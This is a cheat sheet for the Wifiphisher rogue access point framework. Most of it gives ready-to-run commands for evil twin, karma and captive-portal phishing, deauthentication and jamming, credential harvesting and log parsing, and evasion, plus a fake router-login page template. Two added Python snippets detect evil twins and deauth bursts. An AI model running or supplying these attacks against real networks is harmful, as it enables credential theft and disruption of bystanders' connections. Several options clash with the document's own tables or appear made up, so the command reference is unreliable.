
Wifiphisher Wireless Phishing Framework Cheat Sheet


Overview

Wifiphisher is a rogue access point framework for conducting red team engagements or Wi-Fi security testing. It creates fake wireless networks to run automated phishing attacks against wireless clients, capture credentials, and perform man-in-the-middle attacks.

Warning: This tool is intended only for authorized penetration testing and wireless security assessments. Make sure you have proper authorization before using it in any environment.

Installation

Kali Linux

# Install from repositories
sudo apt update
sudo apt install wifiphisher

# Install additional dependencies
sudo apt install hostapd dnsmasq

Ubuntu/Debian

# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git hostapd dnsmasq

# Clone repository
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher

# Install Python dependencies
pip3 install -r requirements.txt

# Install Wifiphisher
sudo python3 setup.py install

Manual Installation

# Install required packages
sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev

# Clone and install
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python3 setup.py install

Docker Installation

# Build Docker image
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
docker build -t wifiphisher .

# Run with network privileges
docker run --rm -it --net=host --privileged wifiphisher

Basic Usage

Simple Attack

# Basic attack with automatic target selection
sudo wifiphisher

# Attack specific network
sudo wifiphisher -t "Target_Network"

# Use specific interface
sudo wifiphisher -i wlan0

# Use custom template
sudo wifiphisher -p firmware-upgrade

Interface Management

# List available interfaces
sudo wifiphisher --list-interfaces

# Use specific interfaces
sudo wifiphisher -i wlan0 -jI wlan1

# Monitor mode setup
sudo airmon-ng start wlan0
sudo wifiphisher -i wlan0mon

Command Reference

Basic Options

Option                       Description
-t, --target                 Target network ESSID
-i, --interface              Wireless interface
-jI, --jam-interface         Interface for jamming
-p, --phishing-scenario      Phishing template
-pK, --presharedkey          WPA/WPA2 pre-shared key
-qS, --quitonsuccess         Quit on credential capture

Advanced Options

Option                       Description
-aI, --apinterface           AP interface
-nJ, --nojamming             Disable jamming
-e, --essid                  Access Point ESSID
-dE, --deauth-essid          Deauth specific ESSID
-dC, --deauth-channels       Deauth channels
-nE, --noextensions          Disable extensions

Logging Options

Option                       Description
-l, --logging                Enable logging
-lP, --log-path              Log file path
-cP, --credential-log-path   Credential log path
-lC, --log-credentials       Log captured credentials

Phishing Templates

Available Templates

# List available templates
sudo wifiphisher --list-phishing-scenarios

# Common templates:
# - firmware-upgrade: Router firmware upgrade
# - oauth-login: OAuth login page
# - wifi-connect: WiFi connection page
# - browser-plugin-update: Browser plugin update
# - network-manager-connect: Network manager

Firmware Upgrade Template

# Use firmware upgrade scenario
sudo wifiphisher -p firmware-upgrade -t "Target_Network"

# This template:
# - Creates fake router admin page
# - Requests admin credentials
# - Simulates firmware upgrade process

OAuth Login Template

# Use OAuth login scenario
sudo wifiphisher -p oauth-login -t "Target_Network"

# This template:
# - Creates fake OAuth login page
# - Captures social media credentials
# - Redirects to legitimate service

Custom Template Creation

# Template directory structure
/usr/share/wifiphisher/data/phishing-pages/custom-template/
├── config.ini
├── html/
│   ├── index.html
│   ├── style.css
│   └── script.js
└── static/
    └── images/

Template Configuration (config.ini)

[info]
Name = Custom Template
Description = Custom phishing template
Language = en

[context]
# Template-specific settings
ESSID = {ESSID}
MAC = {MAC}
CHANNEL = {CHANNEL}

Advanced Attacks

Evil Twin Attack

# Create evil twin of target network
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade

# With specific MAC address
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55

# With channel specification
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6
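
From the defender's side, a network that copies a protected ESSID (and possibly the MAC address or channel, as in the commands above) can be spotted by comparing beacon observations with an inventory of authorized access points. This is an added example, not part of Wifiphisher or of the original cheat sheet; the inventory, the scan records and the function name find_evil_twins are constructed for illustration.

```python
# Authorized AP inventory for the protected ESSID (constructed sample values).
AUTHORIZED = {
    "Corporate_WiFi": {
        "aa:bb:cc:00:00:01": {"channel": 1, "security": "WPA2-Enterprise"},
        "aa:bb:cc:00:00:02": {"channel": 11, "security": "WPA2-Enterprise"},
    }
}

# Constructed beacon observations: (essid, bssid, channel, security).
SCAN = [
    ("Corporate_WiFi", "AA:BB:CC:00:00:01", 1, "WPA2-Enterprise"),   # legitimate
    ("Corporate_WiFi", "aa:bb:cc:00:00:02", 11, "WPA2-Enterprise"),  # legitimate
    ("Corporate_WiFi", "00:11:22:33:44:55", 6, "Open"),              # unknown BSSID
    ("Corporate_WiFi", "aa:bb:cc:00:00:01", 6, "Open"),              # cloned BSSID
    ("Cafe_Guest", "de:ad:be:ef:00:01", 3, "Open"),                  # not protected
]


def find_evil_twins(scan, authorized):
    """Return sorted (bssid, reason) findings for protected ESSIDs."""
    findings = set()
    for essid, bssid, channel, security in scan:
        inventory = authorized.get(essid)
        if inventory is None:
            continue  # ESSID is not one we protect
        bssid = bssid.lower()
        expected = inventory.get(bssid)
        if expected is None:
            # Same network name from a radio that is not in the inventory.
            findings.add((bssid, "unknown-bssid"))
            continue
        # A cloned BSSID passes the allowlist, so compare its other attributes.
        if security != expected["security"]:
            findings.add((bssid, "security-mismatch"))
        if channel != expected["channel"]:
            findings.add((bssid, "channel-mismatch"))
    return sorted(findings)


if __name__ == "__main__":
    for bssid, reason in find_evil_twins(SCAN, AUTHORIZED):
        print(f"ALERT Corporate_WiFi {bssid}: {reason}")
```

Where access points use automatic channel selection, treat channel-mismatch as a weaker signal than security-mismatch or unknown-bssid.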

Captive Portal Attack

# Create captive portal
sudo wifiphisher -e "Free_WiFi" -p wifi-connect

# Custom captive portal
sudo wifiphisher -e "Hotel_WiFi" -p oauth-login

# Corporate network simulation
sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect

WPA/WPA2 Handshake Capture

# Capture handshakes while phishing
sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture

# Specify handshake output file
sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/

Karma Attack

# Respond to all probe requests
sudo wifiphisher --karma

# Karma with specific template
sudo wifiphisher --karma -p oauth-login

# Karma with custom ESSID list
sudo wifiphisher --karma --essid-list /path/to/essid_list.txt

Jamming and Deauthentication

Targeted Deauthentication

# Deauth specific network
sudo wifiphisher -dE "Target_Network"

# Deauth specific client
sudo wifiphisher -dC 00:11:22:33:44:55

# Deauth on specific channels
sudo wifiphisher --deauth-channels 1,6,11
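
Deauthentication bursts like these show up on a wireless sensor as a spike in 802.11 management frames of subtype 12 (deauthentication) or 10 (disassociation). The following detection logic is an added example, not part of Wifiphisher or of the original cheat sheet; the frame records, the window and the threshold are constructed assumptions to tune per site.

```python
from collections import defaultdict, deque

BEACON, DISASSOC, DEAUTH = 8, 10, 12  # 802.11 management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"


def make_sample():
    """Constructed frame records: (timestamp_ms, bssid, destination, subtype)."""
    frames = [(500, "aa:bb:cc:00:00:02", "10:20:30:40:50:60", DEAUTH)]  # one normal deauth
    # 30 broadcast deauths in 3 seconds for one BSSID: the burst to detect.
    frames += [(10000 + i * 100, "aa:bb:cc:00:00:01", BROADCAST, DEAUTH) for i in range(30)]
    # Ordinary beacons must not count toward the threshold.
    frames += [(9000 + i * 100, "aa:bb:cc:00:00:01", BROADCAST, BEACON) for i in range(50)]
    return sorted(frames)


def detect_deauth_bursts(frames, window_ms=5000, threshold=20):
    """Return {bssid: time of first alert} for BSSIDs whose deauth/disassoc
    frame count reaches `threshold` within a sliding `window_ms`."""
    recent = defaultdict(deque)  # bssid -> timestamps still inside the window
    alerts = {}
    for ts, bssid, _dst, subtype in frames:
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window_ms:
            q.popleft()  # drop frames that fell out of the window
        if len(q) >= threshold and bssid not in alerts:
            alerts[bssid] = ts
    return alerts


if __name__ == "__main__":
    for bssid, ts in detect_deauth_bursts(make_sample()).items():
        print(f"ALERT deauth burst against {bssid} at t={ts} ms")
```

Enabling 802.11w (Protected Management Frames) on the network makes clients ignore forged deauthentication frames, which complements this detection.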

Jamming Configuration

# Use separate interface for jamming
sudo wifiphisher -i wlan0 -jI wlan1

# Disable jamming
sudo wifiphisher -nJ

# Custom jamming parameters
sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11

Intelligent Jamming

# Intelligent jamming based on target
sudo wifiphisher -t "Target_Network" --smart-jamming

# Adaptive jamming
sudo wifiphisher --adaptive-jamming --jam-threshold 5

Extensions and Plugins

Available Extensions

# List available extensions
sudo wifiphisher --list-extensions

# Common extensions:
# - credentialharvester: Capture credentials
# - handshakecapture: Capture WPA handshakes
# - dnsmasqhandler: DNS spoofing
# - captiveportal: Captive portal functionality

Credential Harvester

# Enable credential harvesting
sudo wifiphisher -p oauth-login --credentialharvester

# Custom credential log
sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log

Handshake Capture Extension

# Enable handshake capture
sudo wifiphisher -t "Target_Network" --handshakecapture

# Specify capture directory
sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/

DNS Spoofing Extension

# Enable DNS spoofing
sudo wifiphisher --dnsmasqhandler

# Custom DNS configuration
sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf

Custom Template Development

HTML Template Structure


<!DOCTYPE html>
<html>
<head>
    <title>Router Configuration</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <h1>Router Firmware Update</h1>
        <p>Network: {ESSID}</p>
        <form method="post" action="/login">
            <input type="text" name="username" placeholder="Admin Username" required>
            <input type="password" name="password" placeholder="Admin Password" required>
            <button type="submit">Update Firmware</button>
        </form>
    </div>
    <script src="script.js"></script>
</body>
</html>

CSS Styling

/* style.css */
body {
    font-family: Arial, sans-serif;
    background: #f0f0f0;
    margin: 0;
    padding: 50px;
}

.container {
    max-width: 400px;
    margin: auto;
    background: white;
    padding: 30px;
    border-radius: 5px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}

input {
    width: 100%;
    padding: 12px;
    margin: 10px 0;
    border: 1px solid #ddd;
    border-radius: 3px;
}

button {
    width: 100%;
    background: #007cba;
    color: white;
    padding: 12px;
    border: none;
    border-radius: 3px;
    cursor: pointer;
}

JavaScript Functionality

// script.js
document.addEventListener('DOMContentLoaded', function() {
    // Add form validation
    const form = document.querySelector('form');
    form.addEventListener('submit', function(e) {
        const username = document.querySelector('input[name="username"]').value;
        const password = document.querySelector('input[name="password"]').value;

        if (!username || !password) {
            e.preventDefault();
            alert('Please enter both username and password');
        }
    });

    // Simulate loading
    setTimeout(function() {
        document.querySelector('.container').style.opacity = '1';
    }, 500);
});

Monitoring and Logging

Real-Time Monitoring

# Monitor in real-time
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l

# Monitor with verbose output
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v

# Monitor specific log file
tail -f /var/log/wifiphisher.log

Credential Logging

# Enable credential logging
sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log

# Monitor captured credentials
tail -f /tmp/credentials.log

# Parse credential log
grep -o '"username":"[^"]*"' /tmp/credentials.log|cut -d'"' -f4

Traffic Analysis

# Capture network traffic
sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap

# Analyze with Wireshark
wireshark /tmp/wifiphisher_traffic.pcap

# Extract HTTP credentials
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

Evasion Techniques

MAC Address Randomization

# Use random MAC address
sudo wifiphisher -t "Target_Network" --random-mac

# Use specific MAC address
sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55

# Clone target AP MAC
sudo wifiphisher -t "Target_Network" --clone-mac

Channel Hopping

# Use channel hopping
sudo wifiphisher --channel-hop

# Specific channel sequence
sudo wifiphisher --channel-sequence 1,6,11,1,6,11

# Random channel selection
sudo wifiphisher --random-channel

Timing Evasion

# Delayed start
sudo wifiphisher -t "Target_Network" --delay 300

# Random intervals
sudo wifiphisher -t "Target_Network" --random-intervals

# Burst mode
sudo wifiphisher -t "Target_Network" --burst-mode

Troubleshooting

Interface Issues

# Check interface status
iwconfig

# Reset interface
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up

# Check for monitor mode support
sudo iw list|grep -A 10 "Supported interface modes"

# Kill conflicting processes
sudo airmon-ng check kill

Permission Issues

# Check permissions
ls -la /usr/bin/wifiphisher

# Fix permissions
sudo chmod +x /usr/bin/wifiphisher

# Check sudo configuration
sudo visudo

Dependency Issues

# Check Python dependencies
pip3 list|grep -E "(scapy|netfilterqueue|roguehostapd)"

# Reinstall dependencies
pip3 install --upgrade -r requirements.txt

# Check system packages
dpkg -l|grep -E "(hostapd|dnsmasq)"

Network Issues

# Check network configuration
ip addr show

# Check routing table
ip route show

# Test internet connectivity
ping -c 4 8.8.8.8

# Check DNS resolution
nslookup google.com

Legal and Ethical Considerations

Authorization Requirements

# Always obtain written authorization
# Document scope and limitations
# Follow responsible disclosure
# Respect privacy and data protection laws

Best Practices

# Use only for authorized testing
# Minimize impact on legitimate users
# Provide immediate feedback and education
# Secure captured data appropriately
# Follow industry standards and guidelines

Resources

-...

*This cheat sheet provides a comprehensive reference for using Wifiphisher. Always make sure you have proper authorization before performing wireless security assessments.*